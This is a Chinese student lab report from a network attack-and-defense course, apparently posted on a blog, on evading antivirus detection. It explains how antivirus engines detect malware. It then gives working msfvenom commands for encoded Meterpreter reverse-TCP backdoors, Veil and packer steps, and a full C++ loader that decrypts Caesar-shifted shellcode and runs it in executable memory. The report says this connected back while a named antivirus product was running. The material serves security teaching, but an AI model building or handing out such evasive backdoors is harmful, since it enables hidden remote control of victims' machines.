20222302 2024-2025-1 《网络与系统攻防技术》实验三实验报告

1.实验内容

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

(2)通过组合应用各种技术实现恶意代码免杀

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

问题回答:

(1)杀软是如何检测出恶意代码的?

杀软检测恶意代码主要通过以下几种方式:

1. 基于特征码检测:
- 原理:这是最经典且应用广泛的方法。杀软开发者从已知的恶意代码样本中提取出独特的代码片段、字节序列等特征,这些特征就像是恶意代码的“指纹”。然后将这些特征整理并存储到杀软的特征库中。在进行检测时,杀软会对被检测的文件或程序进行扫描分析,将其代码与特征库中的特征进行比对。如果发现匹配的特征,就判定该文件或程序为恶意代码。
2. 基于启发式检测:
- 静态启发式检测:
  - 原理:分析程序的代码结构、函数调用、指令序列等静态特征,根据预先设定的规则和经验判断程序是否具有恶意行为的迹象。例如,如果一个程序试图隐藏自身的运行痕迹、修改系统关键文件或注册表项,或者包含一些可疑的代码逻辑,杀软就会认为该程序可能是恶意的。
- 动态启发式检测:
  - 原理:在一个隔离的环境(如沙箱)中运行被检测的程序,观察其在运行过程中的行为,如文件操作、网络通信、系统资源占用等。如果程序的行为符合恶意代码的行为模式,比如大量发送网络数据包、篡改重要系统文件、创建异常的进程等,杀软就会判定该程序为恶意代码。
3. 基于行为检测:
- 原理:建立一个正常程序行为的模型,通过对大量正常程序的行为进行学习和分析,总结出正常程序的行为模式和特征。在检测时,杀软会将被检测程序的行为与正常程序行为模型进行对比,如果发现被检测程序的行为与正常程序行为模型严重不符,就判断该程序为恶意代码。例如,正常的办公软件不会在后台偷偷连接陌生的网络服务器,而恶意代码可能会进行这样的操作。
4. 基于机器学习的检测:
- 原理:利用机器学习算法对大量的恶意代码样本和正常程序样本进行训练,让算法学习恶意代码和正常程序的特征和模式。训练完成后,杀软可以使用训练好的模型对新的程序进行检测,根据模型的输出结果判断程序是否为恶意代码。
5. 基于云安全的检测:
- 原理:杀软将被检测程序的特征或行为信息上传到云端服务器,与云端的恶意代码数据库和分析系统进行比对和分析。云端服务器拥有庞大的恶意代码样本库和强大的计算资源,可以对上传的信息进行快速、准确的检测。如果云端检测到程序为恶意代码,会将结果返回给用户端的杀软。

(2)免杀是做什么?

免杀,即反杀毒技术,是指通过各种技术手段使恶意代码(如病毒、木马、后门程序等)能够躲避杀毒软件的检测和查杀。
免杀技术的涉猎面非常广,包括反汇编、逆向工程、系统漏洞利用以及壳技术等黑客技术,因此其难度较高,一般人难以深入掌握。
免杀技术的核心在于修改病毒、木马等恶意软件的内容,以改变其特征码,从而躲避杀毒软件的查杀。特征码是杀毒软件用于识别恶意软件的一段特定代码,通过修改这些代码,恶意软件就能绕过杀毒软件的检测机制。

(3)免杀的基本方法有哪些?

1.代码混淆

包括花指令插入、代码加密、变量名和函数名混淆。

2.加壳与脱壳

加壳:给恶意代码加上一层保护壳,这个壳可以对恶意代码进行压缩、加密或隐藏。当恶意代码运行时,壳会先被执行,然后将恶意代码解压缩或解密并执行。
脱壳:如果恶意代码被加壳,安全软件可能会尝试对其进行脱壳分析。恶意代码开发者可以采用一些反脱壳技术,使得安全软件难以成功脱壳。

3.动态生成代码

运行时生成关键代码:恶意代码在运行时动态生成一部分关键代码,而不是在程序中直接包含这些代码。这样可以避免杀毒软件通过静态分析检测到恶意代码的特征。
代码变形:在每次运行时,恶意代码可以对自身进行变形,改变代码的结构和逻辑。这样即使杀毒软件曾经检测到过该恶意代码,下次也可能因为代码的变化而无法识别。

4.社会工程学手段

伪装成合法软件:将恶意代码伪装成合法的软件,如常见的办公软件、游戏等。通过欺骗用户下载和安装,从而绕过杀毒软件的检测。
利用漏洞攻击:利用操作系统、软件或浏览器的漏洞,将恶意代码注入到目标系统中。由于杀毒软件可能无法及时检测到新出现的漏洞,恶意代码可以在未被察觉的情况下执行。

2.实验过程

任务一:正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1. 使用msfvenom生成jar等文件。

查看 msfvenom 支持的所有输出格式:输入msfvenom --list formats

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=2302 -f exe > 20222302lzy.exe,生成payload;

没有编码的后门程序会被杀毒软件查出,尝试用msf编码器对后门程序进行编码;
输入msfvenom --list encoders查看 msfvenom 支持的所有编码方式;

使用编码器对payload进行编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.12.129 LPORT=2302 -f exe > 20222301lzy-2.exe生成一次编码的后门程序;

发现一次编码后的后门程序还是很容易被查出,尝试对后门程序进行多次编码;
进行多次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.12.129 LPORT=2302 -f exe > 20222302lzy-3.exe生成10次编码的后门程序;

发现多次编码后的后门程序依然会被查出,由此可知编码对后门程序的隐藏作用不大;
选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=2302 -f jar > 20222302lzy-4.jar

再对payload进行编码,输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=2302 -e x86/shikata_ga_nai -i 10 -f jar > 20222302lzy-5.jar

生成一个反向 TCP 连接的 Linux elf 可执行文件,输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=2302 -f elf > 20222302lzy-6.elf

再对payload进行编码,输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=2302 -e x86/shikata_ga_nai -i 10 -f elf > 20222302lzy-7.elf

根据结果发现指数小了很多,有很明显的作用;

2.使用veil,加壳工具

安装veil,依次输入以下命令:

mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32

当输入完sudo apt-get install wine32后报错,此时先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可;

再依次输入:
apt-get install veil
sudo su
cd /usr/share/veil/config/
vim setup.sh

打开文件后将第251行的下载地址改为https://gitee.com/spears/VeilDependencies.git

运行veil进行安装;

发现报错,输入sudo /usr/share/veil/config/setup.sh --force --silent,继续安装;

完成安装,输入veil

输入use evasion进入Evil—Evasion;

输入list查看可使用的payload类型;

使用c/meterpretermrev_tcp.py,即7号,所以输入use 7

查看虚拟机IP,输入命令ifconfig

依次输入:

set LHOST 192.168.12.129	
set LPORT 2302
generate

输入生成的文件名称:20222302_veil

输入cd /var/lib/veil/output/compiled/,进入文件夹,输入ls查看生成的.exe可执行文件;

对新生成的文件20222302_veil.exe进行检测;

3.使用C + shellcode编程

输入命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=2302 -f c

新建20222302.c文件,并进行编辑;

按i键进入编辑模式,将使用msfvenom生成的buf[]数组放到打开的文件中,并输入C语言代码,代码如下;

输入i686-w64-mingw32-g++ 20222302.c -o 20222302.exe

对20222302.exe进行检测;

4.加壳

upx加壳:输入命令upx 20222302.exe -o upx20222302.exe

hyperion加壳:输入

cp upx20222302.exe /usr/share/windows-resources/hyperion

输入

cd /usr/share/windows-resources/hyperion

进入文件夹
输入ls查看生成的可执行文件;

输入命令wine hyperion.exe -v upx20222302.exe upx20222302lzy.exe

对两个文件进行检测;

任务二:通过组合应用各种技术实现恶意代码免杀

组合技术:msfvenom生成Shellcode数组,再使用凯撒加密对数组进行加密,将加密后的密文放入txt文件中,再编写C语言代码,从txt文件中读取密文,解密并运行Shellcode,最后生成.exe可执行文件。
虚拟机输入命令

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=10086 -f c

新建20222302_encrypt.cpp文件,输入代码,代码功能为将复制内容放入shellcode1[]数组中,通过代码将shellcode1进行凯撒加密,将密文输入到20222302encrypt.txt文件中;
在同文件夹下新建空文件20222302_encrypt.txt,用以存放密文;
代码如下:

#include <stdio.h>

#include<string.h>

void caesarEncrypt(unsigned char *data, size_t length, int shift) {

for (size_t i = 0; i < length; i++) {

// 对每个字节进行位移

data[i]= (data[i] + shift) & 0xFF;

}

}

int main( ) {

unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"

"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"

"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"

"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"

"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"

"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"

"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50\x8b\x48\x18\x49"

"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"

"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"

"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"

"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"

"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"

"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"

"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"

"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"

"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"

"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x4c\x80\x41\x54"

"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"

"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"

"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"

"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"

"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"

"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"

"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"

"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"

"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"

"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"

"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"

"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"

"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"

"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"

"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"

"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"

"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"

"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"

"\xf0\xb5\xa2\x56\xff\xd5";

int shift =3; // 加密位移

printf("original: ");

for (size_t i = 0; i < 510; i++) {

printf("\\x%02x",shellcode1[i]);

}

printf("\n");

caesarEncrypt(shellcode1,510,shift);

printf("Encrypted:");

for (size_t i =0;i< 510; i++){

printf("\\x%02x",shellcode1[i]);

    }

printf("\n");

    FILE *file = fopen("20222302encrypt.txt", "w");

    if (file != NULL) {

        for (size_t i = 0; i < 510; i++) {

            fprintf(file, "\\x%02x", shellcode1[i]);

        }

        fprintf(file, "\n");

        fclose(file);

    } else {

        printf("Error opening file!\n");

    }

return 0;

}

编辑并运行该文件;
新建20222302declassify.cpp文件,输入代码,代码功能为读取20222302declassify.txt文件中的内容到shellcode1[]数组中,并进行解密,再运行shellcode;
代码如下:

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void caesarDecrypt(unsigned char *data, size_t length, int shift) {

    for (size_t i = 0; i < length; i++) {

        // 对每个字节进行位移

        data[i] = (unsigned char)((data[i] - shift + 256) % 256);

    }

}



int main() {

    int shift = 3; // 凯撒加密的位移值

    unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节

    char line[1024]; // 用于读取文件的临时缓冲区



    // 打开文件

    FILE *file = fopen("20222302declassify.txt", "r");

    if (file == NULL) {

        perror("Error opening file");

        return 1;

    }



    // 读取文件内容到shellcode1数组中

    size_t length = 0;

    while (fgets(line, sizeof(line), file)) {

        // 将读取的十六进制字符串转换为字节并存储在shellcode1中

        for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {

            if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {

                length++;

            }

        }

    }

    fclose(file);



    // 解密shellcode

    caesarDecrypt(shellcode1, length, shift);



    // 输出解密后的shellcode

    /*printf("Decrypted Shellcode:\n");

    for (size_t i = 0; i < 510; i++) {

        printf("\\x%02x", shellcode1[i]);

    }

    printf("\n");*/



    // 分配内存并设置为可执行

    LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);



    // 将解密后的shellcode复制到分配的内存中

    memcpy(exec, shellcode1, sizeof shellcode1);

    // 执行shellcode

    ((void(*)())exec)();



    return 0;

}

编译该文件,打开文件所在位置,可以看到如下文件:

20222302declassify.exe即为所需文件;
通过共享文件夹将20222302_declassify.exe文件以及2022230_encrypt.txt两个文件放在桌面;
查看防火墙的状态,发现可以与杀软共生;

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

在kali中使用msfconsole指令进入msf控制台,对msf控制台进行配置;
依次输入以下命令:

use exploit/multi/handler  
set payload windows/x64/meterpreter/reverse_tcp  
set LHOST 192.168.12.129 
set LPORT 10086

输入run

Win10虚拟机双击运行20222302_declassify.exe文件,在kali输入sysinfo,查看版本;

可以查看到win10版本,说明回连并攻击成功。
电脑的杀软名称与版本:360安全卫士极速版,15.0.2.1009

3.问题及解决方案

问题1:在安装veil的过程中当输入完sudo apt-get install wine32后报错。

解决方案:先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可。

问题2:在依次输入:apt-get install veil sudo su cd /usr/share/veil/config/ vim setup.sh并打开文件后将第251行的下载地址改为https://gitee.com/spears/VeilDependencies.git后运行veil进行安装时出现报错。

解决方案:输入sudo /usr/share/veil/config/setup.sh --force --silent,继续安装。

问题3:最开始生成shellcode时使用的是msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=10086 -f c,发现最后生成的恶意可执行文件打开后几秒便消失了,无法运行到底。

解决方案:更换版本,使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.12.129 LPORT=10086 -f c,最后成功运行。

问题4:使用msfconsole,设置端口号为学号后四位,但是输入run后显示不成功。

解决方案:可能是端口被占用,将端口号改为5位的10086后可以正常运行。

4.学习感悟、思考

在本次实验中,我学习了如何通过msf编码器、veil、加壳工具、C + shellcode编程等多种方式生成恶意程序,并尝试实现免杀。
本次实验最困难的部分我认为是veil的安装,真正诠释了什么叫作“路漫漫其修远兮,吾将上下而求索”。但是经过不懈的努力解决了安装过程中各种各样的问题,做到了“长风破浪会有时,直挂云帆济沧海”。
通过本次实验我学到了多种免杀方法,掌握了免杀的原理,让我见识到免杀手段之多,尽管我们有层层防护还是会被各种恶意程序钻空子。防护工作仍然需要不断精进不断完善。网络安全之路任重而道远。

posted @ 2024-10-20 17:09  北河三1  阅读(52)  评论(0编辑  收藏  举报